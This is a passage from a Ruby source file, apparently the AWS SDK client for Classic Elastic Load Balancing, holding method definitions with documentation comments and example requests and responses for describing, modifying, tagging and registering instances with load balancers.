# @return [Types::DescribeEndPointStateOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeEndPointStateOutput#instance_states #instance_states} => Array<Types::InstanceState>
#
#
# @example Example: To describe the health of the instances for a load balancer
#
# # This example describes the health of the instances for the specified load balancer.
#
# resp = client.describe_instance_health({
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# instance_states: [
# {
# description: "N/A",
# instance_id: "i-207d9717",
# reason_code: "N/A",
# state: "InService",
# },
# {
# description: "N/A",
# instance_id: "i-afefb49b",
# reason_code: "N/A",
# state: "InService",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_instance_health({
# load_balancer_name: "AccessPointName", # required
# instances: [
# {
# instance_id: "InstanceId",
# },
# ],
# })
#
# @example Response structure
#
# resp.instance_states #=> Array
# resp.instance_states[0].instance_id #=> String
# resp.instance_states[0].state #=> String
# resp.instance_states[0].reason_code #=> String
# resp.instance_states[0].description #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeInstanceHealth AWS API Documentation
#
# @overload describe_instance_health(params = {})
# @param [Hash] params ({})
def describe_instance_health(params = {}, options = {})
req = build_request(:describe_instance_health, params)
req.send_request(options)
end
# Describes the attributes for the specified load balancer.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @return [Types::DescribeLoadBalancerAttributesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLoadBalancerAttributesOutput#load_balancer_attributes #load_balancer_attributes} => Types::LoadBalancerAttributes
#
#
# @example Example: To describe the attributes of a load balancer
#
# # This example describes the attributes of the specified load balancer.
#
# resp = client.describe_load_balancer_attributes({
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_attributes: {
# access_log: {
# enabled: false,
# },
# connection_draining: {
# enabled: false,
# timeout: 300,
# },
# connection_settings: {
# idle_timeout: 60,
# },
# cross_zone_load_balancing: {
# enabled: false,
# },
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancer_attributes({
# load_balancer_name: "AccessPointName", # required
# })
#
# @example Response structure
#
# resp.load_balancer_attributes.cross_zone_load_balancing.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.s3_bucket_name #=> String
# resp.load_balancer_attributes.access_log.emit_interval #=> Integer
# resp.load_balancer_attributes.access_log.s3_bucket_prefix #=> String
# resp.load_balancer_attributes.connection_draining.enabled #=> Boolean
# resp.load_balancer_attributes.connection_draining.timeout #=> Integer
# resp.load_balancer_attributes.connection_settings.idle_timeout #=> Integer
# resp.load_balancer_attributes.additional_attributes #=> Array
# resp.load_balancer_attributes.additional_attributes[0].key #=> String
# resp.load_balancer_attributes.additional_attributes[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancerAttributes AWS API Documentation
#
# @overload describe_load_balancer_attributes(params = {})
# @param [Hash] params ({})
def describe_load_balancer_attributes(params = {}, options = {})
req = build_request(:describe_load_balancer_attributes, params)
req.send_request(options)
end
# Describes the specified policies.
#
# If you specify a load balancer name, the action returns the
# descriptions of all policies created for the load balancer. If you
# specify a policy name associated with your load balancer, the action
# returns the description of that policy. If you don't specify a load
# balancer name, the action returns descriptions of the specified sample
# policies, or descriptions of all sample policies. The names of the
# sample policies have the `ELBSample-` prefix.
#
# @option params [String] :load_balancer_name
# The name of the load balancer.
#
# @option params [Array<String>] :policy_names
# The names of the policies.
#
# @return [Types::DescribeLoadBalancerPoliciesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLoadBalancerPoliciesOutput#policy_descriptions #policy_descriptions} => Array<Types::PolicyDescription>
#
#
# @example Example: To describe a policy associated with a load balancer
#
# # This example describes the specified policy associated with the specified load balancer.
#
# resp = client.describe_load_balancer_policies({
# load_balancer_name: "my-load-balancer",
# policy_names: [
# "my-authentication-policy",
# ],
# })
#
# resp.to_h outputs the following:
# {
# policy_descriptions: [
# {
# policy_attribute_descriptions: [
# {
# attribute_name: "PublicKeyPolicyName",
# attribute_value: "my-PublicKey-policy",
# },
# ],
# policy_name: "my-authentication-policy",
# policy_type_name: "BackendServerAuthenticationPolicyType",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancer_policies({
# load_balancer_name: "AccessPointName",
# policy_names: ["PolicyName"],
# })
#
# @example Response structure
#
# resp.policy_descriptions #=> Array
# resp.policy_descriptions[0].policy_name #=> String
# resp.policy_descriptions[0].policy_type_name #=> String
# resp.policy_descriptions[0].policy_attribute_descriptions #=> Array
# resp.policy_descriptions[0].policy_attribute_descriptions[0].attribute_name #=> String
# resp.policy_descriptions[0].policy_attribute_descriptions[0].attribute_value #=> <Hash,Array,String,Numeric,Boolean,IO,Set,nil>
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancerPolicies AWS API Documentation
#
# @overload describe_load_balancer_policies(params = {})
# @param [Hash] params ({})
def describe_load_balancer_policies(params = {}, options = {})
req = build_request(:describe_load_balancer_policies, params)
req.send_request(options)
end
# Describes the specified load balancer policy types or all load
# balancer policy types.
#
# The description of each type indicates how it can be used. For
# example, some policies can be used only with layer 7 listeners, some
# policies can be used only with layer 4 listeners, and some policies
# can be used only with your EC2 instances.
#
# You can use CreateLoadBalancerPolicy to create a policy configuration
# for any of these policy types. Then, depending on the policy type, use
# either SetLoadBalancerPoliciesOfListener or
# SetLoadBalancerPoliciesForBackendServer to set the policy.
#
# @option params [Array<String>] :policy_type_names
# The names of the policy types. If no names are specified, describes
# all policy types defined by Elastic Load Balancing.
#
# @return [Types::DescribeLoadBalancerPolicyTypesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLoadBalancerPolicyTypesOutput#policy_type_descriptions #policy_type_descriptions} => Array<Types::PolicyTypeDescription>
#
#
# @example Example: To describe a load balancer policy type defined by Elastic Load Balancing
#
# # This example describes the specified load balancer policy type.
#
# resp = client.describe_load_balancer_policy_types({
# policy_type_names: [
# "ProxyProtocolPolicyType",
# ],
# })
#
# resp.to_h outputs the following:
# {
# policy_type_descriptions: [
# {
# description: "Policy that controls whether to include the IP address and port of the originating request for TCP messages. This policy operates on TCP listeners only.",
# policy_attribute_type_descriptions: [
# {
# attribute_name: "ProxyProtocol",
# attribute_type: "Boolean",
# cardinality: "ONE",
# },
# ],
# policy_type_name: "ProxyProtocolPolicyType",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancer_policy_types({
# policy_type_names: ["PolicyTypeName"],
# })
#
# @example Response structure
#
# resp.policy_type_descriptions #=> Array
# resp.policy_type_descriptions[0].policy_type_name #=> String
# resp.policy_type_descriptions[0].description #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions #=> Array
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].attribute_name #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].attribute_type #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].description #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].default_value #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].cardinality #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancerPolicyTypes AWS API Documentation
#
# @overload describe_load_balancer_policy_types(params = {})
# @param [Hash] params ({})
def describe_load_balancer_policy_types(params = {}, options = {})
req = build_request(:describe_load_balancer_policy_types, params)
req.send_request(options)
end
    # Describes the specified load balancers. If no load balancers are
# specified, the call describes all of your load balancers.
#
# @option params [Array<String>] :load_balancer_names
# The names of the load balancers.
#
# @option params [String] :marker
# The marker for the next set of results. (You received this marker from
# a previous call.)
#
# @option params [Integer] :page_size
# The maximum number of results to return with this call (a number from
# 1 to 400). The default is 400.
#
# @return [Types::DescribeAccessPointsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeAccessPointsOutput#load_balancer_descriptions #load_balancer_descriptions} => Array<Types::LoadBalancerDescription>
# * {Types::DescribeAccessPointsOutput#next_marker #next_marker} => String
#
#
# @example Example: To describe one of your load balancers
#
# # This example describes the specified load balancer.
#
# resp = client.describe_load_balancers({
# load_balancer_names: [
# "my-load-balancer",
# ],
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_descriptions: [
# {
# availability_zones: [
# "us-west-2a",
# ],
# backend_server_descriptions: [
# {
# instance_port: 80,
# policy_names: [
# "my-ProxyProtocol-policy",
# ],
# },
# ],
# canonical_hosted_zone_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# canonical_hosted_zone_name_id: "Z3DZXE0EXAMPLE",
# created_time: Time.parse("2015-03-19T03:24:02.650Z"),
# dns_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# health_check: {
# healthy_threshold: 2,
# interval: 30,
# target: "HTTP:80/png",
# timeout: 3,
# unhealthy_threshold: 2,
# },
# instances: [
# {
# instance_id: "i-207d9717",
# },
# {
# instance_id: "i-afefb49b",
# },
# ],
# listener_descriptions: [
# {
# listener: {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# policy_names: [
# ],
# },
# {
# listener: {
# instance_port: 443,
# instance_protocol: "HTTPS",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# policy_names: [
# "ELBSecurityPolicy-2015-03",
# ],
# },
# ],
# load_balancer_name: "my-load-balancer",
# policies: {
# app_cookie_stickiness_policies: [
# ],
# lb_cookie_stickiness_policies: [
# {
# cookie_expiration_period: 60,
# policy_name: "my-duration-cookie-policy",
# },
# ],
# other_policies: [
# "my-PublicKey-policy",
# "my-authentication-policy",
# "my-SSLNegotiation-policy",
# "my-ProxyProtocol-policy",
# "ELBSecurityPolicy-2015-03",
# ],
# },
# scheme: "internet-facing",
# security_groups: [
# "sg-a61988c3",
# ],
# source_security_group: {
# group_name: "my-elb-sg",
# owner_alias: "123456789012",
# },
# subnets: [
# "subnet-15aaab61",
# ],
# vpc_id: "vpc-a01106c2",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancers({
# load_balancer_names: ["AccessPointName"],
# marker: "Marker",
# page_size: 1,
# })
#
# @example Response structure
#
# resp.load_balancer_descriptions #=> Array
# resp.load_balancer_descriptions[0].load_balancer_name #=> String
# resp.load_balancer_descriptions[0].dns_name #=> String
# resp.load_balancer_descriptions[0].canonical_hosted_zone_name #=> String
# resp.load_balancer_descriptions[0].canonical_hosted_zone_name_id #=> String
# resp.load_balancer_descriptions[0].listener_descriptions #=> Array
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.protocol #=> String
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.load_balancer_port #=> Integer
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.instance_protocol #=> String
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.instance_port #=> Integer
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.ssl_certificate_id #=> String
# resp.load_balancer_descriptions[0].listener_descriptions[0].policy_names #=> Array
# resp.load_balancer_descriptions[0].listener_descriptions[0].policy_names[0] #=> String
# resp.load_balancer_descriptions[0].policies.app_cookie_stickiness_policies #=> Array
# resp.load_balancer_descriptions[0].policies.app_cookie_stickiness_policies[0].policy_name #=> String
# resp.load_balancer_descriptions[0].policies.app_cookie_stickiness_policies[0].cookie_name #=> String
# resp.load_balancer_descriptions[0].policies.lb_cookie_stickiness_policies #=> Array
# resp.load_balancer_descriptions[0].policies.lb_cookie_stickiness_policies[0].policy_name #=> String
# resp.load_balancer_descriptions[0].policies.lb_cookie_stickiness_policies[0].cookie_expiration_period #=> Integer
# resp.load_balancer_descriptions[0].policies.other_policies #=> Array
# resp.load_balancer_descriptions[0].policies.other_policies[0] #=> String
# resp.load_balancer_descriptions[0].backend_server_descriptions #=> Array
# resp.load_balancer_descriptions[0].backend_server_descriptions[0].instance_port #=> Integer
# resp.load_balancer_descriptions[0].backend_server_descriptions[0].policy_names #=> Array
# resp.load_balancer_descriptions[0].backend_server_descriptions[0].policy_names[0] #=> String
# resp.load_balancer_descriptions[0].availability_zones #=> Array
# resp.load_balancer_descriptions[0].availability_zones[0] #=> String
# resp.load_balancer_descriptions[0].subnets #=> Array
# resp.load_balancer_descriptions[0].subnets[0] #=> String
# resp.load_balancer_descriptions[0].vpc_id #=> String
# resp.load_balancer_descriptions[0].instances #=> Array
# resp.load_balancer_descriptions[0].instances[0].instance_id #=> String
# resp.load_balancer_descriptions[0].health_check.target #=> String
# resp.load_balancer_descriptions[0].health_check.interval #=> Integer
# resp.load_balancer_descriptions[0].health_check.timeout #=> Integer
# resp.load_balancer_descriptions[0].health_check.unhealthy_threshold #=> Integer
# resp.load_balancer_descriptions[0].health_check.healthy_threshold #=> Integer
# resp.load_balancer_descriptions[0].source_security_group.owner_alias #=> String
# resp.load_balancer_descriptions[0].source_security_group.group_name #=> String
# resp.load_balancer_descriptions[0].security_groups #=> Array
# resp.load_balancer_descriptions[0].security_groups[0] #=> String
# resp.load_balancer_descriptions[0].created_time #=> Time
# resp.load_balancer_descriptions[0].scheme #=> String
# resp.next_marker #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancers AWS API Documentation
#
# @overload describe_load_balancers(params = {})
# @param [Hash] params ({})
def describe_load_balancers(params = {}, options = {})
req = build_request(:describe_load_balancers, params)
req.send_request(options)
end
# Describes the tags associated with the specified load balancers.
#
# @option params [required, Array<String>] :load_balancer_names
# The names of the load balancers.
#
# @return [Types::DescribeTagsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeTagsOutput#tag_descriptions #tag_descriptions} => Array<Types::TagDescription>
#
#
# @example Example: To describe the tags for a load balancer
#
# # This example describes the tags for the specified load balancer.
#
# resp = client.describe_tags({
# load_balancer_names: [
# "my-load-balancer",
# ],
# })
#
# resp.to_h outputs the following:
# {
# tag_descriptions: [
# {
# load_balancer_name: "my-load-balancer",
# tags: [
# {
# key: "project",
# value: "lima",
# },
# {
# key: "department",
# value: "digital-media",
# },
# ],
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_tags({
# load_balancer_names: ["AccessPointName"], # required
# })
#
# @example Response structure
#
# resp.tag_descriptions #=> Array
# resp.tag_descriptions[0].load_balancer_name #=> String
# resp.tag_descriptions[0].tags #=> Array
# resp.tag_descriptions[0].tags[0].key #=> String
# resp.tag_descriptions[0].tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeTags AWS API Documentation
#
# @overload describe_tags(params = {})
# @param [Hash] params ({})
def describe_tags(params = {}, options = {})
req = build_request(:describe_tags, params)
req.send_request(options)
end
# Removes the specified subnets from the set of configured subnets for
# the load balancer.
#
# After a subnet is removed, all EC2 instances registered with the load
# balancer in the removed subnet go into the `OutOfService` state. Then,
# the load balancer balances the traffic among the remaining routable
# subnets.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :subnets
# The IDs of the subnets.
#
# @return [Types::DetachLoadBalancerFromSubnetsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DetachLoadBalancerFromSubnetsOutput#subnets #subnets} => Array<String>
#
#
# @example Example: To detach a load balancer from a subnet
#
# # This example detaches the specified load balancer from the specified subnet.
#
# resp = client.detach_load_balancer_from_subnets({
# load_balancer_name: "my-load-balancer",
# subnets: [
# "subnet-0ecac448",
# ],
# })
#
# resp.to_h outputs the following:
# {
# subnets: [
# "subnet-15aaab61",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.detach_load_balancer_from_subnets({
# load_balancer_name: "AccessPointName", # required
# subnets: ["SubnetId"], # required
# })
#
# @example Response structure
#
# resp.subnets #=> Array
# resp.subnets[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DetachLoadBalancerFromSubnets AWS API Documentation
#
# @overload detach_load_balancer_from_subnets(params = {})
# @param [Hash] params ({})
def detach_load_balancer_from_subnets(params = {}, options = {})
req = build_request(:detach_load_balancer_from_subnets, params)
req.send_request(options)
end
# Removes the specified Availability Zones from the set of Availability
# Zones for the specified load balancer in EC2-Classic or a default VPC.
#
# For load balancers in a non-default VPC, use
# DetachLoadBalancerFromSubnets.
#
# There must be at least one Availability Zone registered with a load
# balancer at all times. After an Availability Zone is removed, all
# instances registered with the load balancer that are in the removed
# Availability Zone go into the `OutOfService` state. Then, the load
# balancer attempts to equally balance the traffic among its remaining
# Availability Zones.
#
# For more information, see [Add or Remove Availability Zones][1] in the
# *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-az.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :availability_zones
# The Availability Zones.
#
# @return [Types::RemoveAvailabilityZonesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::RemoveAvailabilityZonesOutput#availability_zones #availability_zones} => Array<String>
#
#
# @example Example: To disable an Availability Zone for a load balancer
#
# # This example removes the specified Availability Zone from the set of Availability Zones for the specified load balancer.
#
# resp = client.disable_availability_zones_for_load_balancer({
# availability_zones: [
# "us-west-2a",
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# availability_zones: [
# "us-west-2b",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.disable_availability_zones_for_load_balancer({
# load_balancer_name: "AccessPointName", # required
# availability_zones: ["AvailabilityZone"], # required
# })
#
# @example Response structure
#
# resp.availability_zones #=> Array
# resp.availability_zones[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DisableAvailabilityZonesForLoadBalancer AWS API Documentation
#
# @overload disable_availability_zones_for_load_balancer(params = {})
# @param [Hash] params ({})
def disable_availability_zones_for_load_balancer(params = {}, options = {})
req = build_request(:disable_availability_zones_for_load_balancer, params)
req.send_request(options)
end
# Adds the specified Availability Zones to the set of Availability Zones
# for the specified load balancer in EC2-Classic or a default VPC.
#
# For load balancers in a non-default VPC, use
# AttachLoadBalancerToSubnets.
#
# The load balancer evenly distributes requests across all its
# registered Availability Zones that contain instances. For more
# information, see [Add or Remove Availability Zones][1] in the *Classic
# Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-az.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :availability_zones
# The Availability Zones. These must be in the same region as the load
# balancer.
#
# @return [Types::AddAvailabilityZonesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::AddAvailabilityZonesOutput#availability_zones #availability_zones} => Array<String>
#
#
# @example Example: To enable an Availability Zone for a load balancer
#
# # This example adds the specified Availability Zone to the specified load balancer.
#
# resp = client.enable_availability_zones_for_load_balancer({
# availability_zones: [
# "us-west-2b",
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# availability_zones: [
# "us-west-2a",
# "us-west-2b",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.enable_availability_zones_for_load_balancer({
# load_balancer_name: "AccessPointName", # required
# availability_zones: ["AvailabilityZone"], # required
# })
#
# @example Response structure
#
# resp.availability_zones #=> Array
# resp.availability_zones[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/EnableAvailabilityZonesForLoadBalancer AWS API Documentation
#
# @overload enable_availability_zones_for_load_balancer(params = {})
# @param [Hash] params ({})
def enable_availability_zones_for_load_balancer(params = {}, options = {})
req = build_request(:enable_availability_zones_for_load_balancer, params)
req.send_request(options)
end
# Modifies the attributes of the specified load balancer.
#
# You can modify the load balancer attributes, such as `AccessLogs`,
# `ConnectionDraining`, and `CrossZoneLoadBalancing` by either enabling
# or disabling them. Or, you can modify the load balancer attribute
# `ConnectionSettings` by specifying an idle connection timeout value
# for your load balancer.
#
# For more information, see the following in the *Classic Load Balancers
# Guide*\:
#
# * [Cross-Zone Load Balancing][1]
#
# * [Connection Draining][2]
#
# * [Access Logs][3]
#
# * [Idle Connection Timeout][4]
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-crosszone-lb.html
# [2]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/config-conn-drain.html
# [3]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/access-log-collection.html
# [4]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/config-idle-timeout.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Types::LoadBalancerAttributes] :load_balancer_attributes
# The attributes for the load balancer.
#
# @return [Types::ModifyLoadBalancerAttributesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ModifyLoadBalancerAttributesOutput#load_balancer_name #load_balancer_name} => String
# * {Types::ModifyLoadBalancerAttributesOutput#load_balancer_attributes #load_balancer_attributes} => Types::LoadBalancerAttributes
#
#
# @example Example: To enable cross-zone load balancing
#
# # This example enables cross-zone load balancing for the specified load balancer.
#
# resp = client.modify_load_balancer_attributes({
# load_balancer_attributes: {
# cross_zone_load_balancing: {
# enabled: true,
# },
# },
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_attributes: {
# cross_zone_load_balancing: {
# enabled: true,
# },
# },
# load_balancer_name: "my-load-balancer",
# }
#
# @example Example: To enable connection draining
#
# # This example enables connection draining for the specified load balancer.
#
# resp = client.modify_load_balancer_attributes({
# load_balancer_attributes: {
# connection_draining: {
# enabled: true,
# timeout: 300,
# },
# },
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_attributes: {
# connection_draining: {
# enabled: true,
# timeout: 300,
# },
# },
# load_balancer_name: "my-load-balancer",
# }
#
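    # A hand-written variant (not a generated example) that sets the idle
    # connection timeout mentioned above; the 120-second value is an
    # arbitrary illustration:
    #
    #     resp = client.modify_load_balancer_attributes({
    #       load_balancer_name: "my-load-balancer",
    #       load_balancer_attributes: {
    #         connection_settings: {
    #           idle_timeout: 120,
    #         },
    #       },
    #     })
    #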
# @example Request syntax with placeholder values
#
# resp = client.modify_load_balancer_attributes({
# load_balancer_name: "AccessPointName", # required
# load_balancer_attributes: { # required
# cross_zone_load_balancing: {
# enabled: false, # required
# },
# access_log: {
# enabled: false, # required
# s3_bucket_name: "S3BucketName",
# emit_interval: 1,
# s3_bucket_prefix: "AccessLogPrefix",
# },
# connection_draining: {
# enabled: false, # required
# timeout: 1,
# },
# connection_settings: {
# idle_timeout: 1, # required
# },
# additional_attributes: [
# {
# key: "AdditionalAttributeKey",
# value: "AdditionalAttributeValue",
# },
# ],
# },
# })
#
# @example Response structure
#
# resp.load_balancer_name #=> String
# resp.load_balancer_attributes.cross_zone_load_balancing.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.s3_bucket_name #=> String
# resp.load_balancer_attributes.access_log.emit_interval #=> Integer
# resp.load_balancer_attributes.access_log.s3_bucket_prefix #=> String
# resp.load_balancer_attributes.connection_draining.enabled #=> Boolean
# resp.load_balancer_attributes.connection_draining.timeout #=> Integer
# resp.load_balancer_attributes.connection_settings.idle_timeout #=> Integer
# resp.load_balancer_attributes.additional_attributes #=> Array
# resp.load_balancer_attributes.additional_attributes[0].key #=> String
# resp.load_balancer_attributes.additional_attributes[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/ModifyLoadBalancerAttributes AWS API Documentation
#
# @overload modify_load_balancer_attributes(params = {})
# @param [Hash] params ({})
def modify_load_balancer_attributes(params = {}, options = {})
req = build_request(:modify_load_balancer_attributes, params)
req.send_request(options)
end
# Adds the specified instances to the specified load balancer.
#
# The instance must be a running instance in the same network as the
# load balancer (EC2-Classic or the same VPC). If you have EC2-Classic
# instances and a load balancer in a VPC with ClassicLink enabled, you
# can link the EC2-Classic instances to that VPC and then register the
# linked EC2-Classic instances with the load balancer in the VPC.
#
# Note that `RegisterInstanceWithLoadBalancer` completes when the
# request has been registered. Instance registration takes a little time
# to complete. To check the state of the registered instances, use
# DescribeLoadBalancers or DescribeInstanceHealth.
#
# After the instance is registered, it starts receiving traffic and
# requests from the load balancer. Any instance that is not in one of
# the Availability Zones registered for the load balancer is moved to
# the `OutOfService` state. If an Availability Zone is added to the load
# balancer later, any instances registered with the load balancer move
# to the `InService` state.
#
# To deregister instances from a load balancer, use
# DeregisterInstancesFromLoadBalancer.
#
# For more information, see [Register or De-Register EC2 Instances][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-deregister-register-instances.html
#
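    # Because registration completes asynchronously (see above), a
    # hand-written sketch (not one of the generated examples) is to pair
    # this call with the `instance_in_service` waiter; the instance ID is a
    # placeholder:
    #
    #     client.register_instances_with_load_balancer({
    #       load_balancer_name: "my-load-balancer",
    #       instances: [{ instance_id: "i-d6f6fae3" }],
    #     })
    #     client.wait_until(:instance_in_service, {
    #       load_balancer_name: "my-load-balancer",
    #       instances: [{ instance_id: "i-d6f6fae3" }],
    #     })
    #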
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Types::Instance>] :instances
# The IDs of the instances.
#
# @return [Types::RegisterEndPointsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::RegisterEndPointsOutput#instances #instances} => Array<Types::Instance>
#
#
# @example Example: To register instances with a load balancer
#
# # This example registers the specified instance with the specified load balancer.
#
# resp = client.register_instances_with_load_balancer({
# instances: [
# {
# instance_id: "i-d6f6fae3",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# instances: [
# {
# instance_id: "i-d6f6fae3",
# },
# {
# instance_id: "i-207d9717",
# },
# {
# instance_id: "i-afefb49b",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.register_instances_with_load_balancer({
# load_balancer_name: "AccessPointName", # required
# instances: [ # required
# {
# instance_id: "InstanceId",
# },
# ],
# })
#
# @example Response structure
#
# resp.instances #=> Array
# resp.instances[0].instance_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/RegisterInstancesWithLoadBalancer AWS API Documentation
#
# @overload register_instances_with_load_balancer(params = {})
# @param [Hash] params ({})
def register_instances_with_load_balancer(params = {}, options = {})
req = build_request(:register_instances_with_load_balancer, params)
req.send_request(options)
end
# Removes one or more tags from the specified load balancer.
#
# @option params [required, Array<String>] :load_balancer_names
# The name of the load balancer. You can specify a maximum of one load
# balancer name.
#
# @option params [required, Array<Types::TagKeyOnly>] :tags
# The list of tag keys to remove.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To remove tags from a load balancer
#
# # This example removes the specified tag from the specified load balancer.
#
# resp = client.remove_tags({
# load_balancer_names: [
# "my-load-balancer",
# ],
# tags: [
# {
# key: "project",
# },
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.remove_tags({
# load_balancer_names: ["AccessPointName"], # required
# tags: [ # required
# {
# key: "TagKey",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/RemoveTags AWS API Documentation
#
# @overload remove_tags(params = {})
# @param [Hash] params ({})
def remove_tags(params = {}, options = {})
req = build_request(:remove_tags, params)
req.send_request(options)
end
# Sets the certificate that terminates the specified listener's SSL
# connections. The specified certificate replaces any prior certificate
# that was used on the same load balancer and port.
#
# For more information about updating your SSL certificate, see [Replace
# the SSL Certificate for Your Load Balancer][1] in the *Classic Load
# Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-update-ssl-cert.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Integer] :load_balancer_port
# The port that uses the specified SSL certificate.
#
# @option params [required, String] :ssl_certificate_id
# The Amazon Resource Name (ARN) of the SSL certificate.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To update the SSL certificate for an HTTPS listener
#
# # This example replaces the existing SSL certificate for the specified HTTPS listener.
#
# resp = client.set_load_balancer_listener_ssl_certificate({
# load_balancer_name: "my-load-balancer",
# load_balancer_port: 443,
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/new-server-cert",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.set_load_balancer_listener_ssl_certificate({
# load_balancer_name: "AccessPointName", # required
# load_balancer_port: 1, # required
# ssl_certificate_id: "SSLCertificateId", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/SetLoadBalancerListenerSSLCertificate AWS API Documentation
#
# @overload set_load_balancer_listener_ssl_certificate(params = {})
# @param [Hash] params ({})
def set_load_balancer_listener_ssl_certificate(params = {}, options = {})
req = build_request(:set_load_balancer_listener_ssl_certificate, params)
req.send_request(options)
end
# Replaces the set of policies associated with the specified port on
